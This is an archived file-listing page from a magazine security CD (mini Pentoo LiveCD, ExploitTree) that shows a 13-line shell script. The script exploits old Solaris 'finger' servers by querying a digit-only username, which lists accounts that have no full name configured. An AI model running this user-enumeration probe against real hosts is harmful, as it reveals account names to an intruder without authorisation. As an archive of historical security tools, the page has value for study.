home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
Chip 2007 January, February, March & April
/
Chip-Cover-CD-2007-02.iso
/
Pakiet bezpieczenstwa
/
mini Pentoo LiveCD 2006.1
/
mpentoo-2006.1.iso
/
livecd.squashfs
/
opt
/
pentoo
/
ExploitTree
/
system
/
solaris
/
local
/
fng.sh
< prev
next >
Wrap
Linux/UNIX/POSIX Shell Script
|
2005-02-12
|
380b
|
13 lines
#!/bin/sh
#
# If you use digits as username, Solaris "finger" will list
# the users who have not configured full name in /etc/passwd.
#
# Affected: solaris 2.7, solaris 8.0
#
# Usage:
# ./fng.sh <host>
# Found by warning3
echo -n "Targetting: "
finger 01234567@$1
# www.hack.co.za [19 April 2001]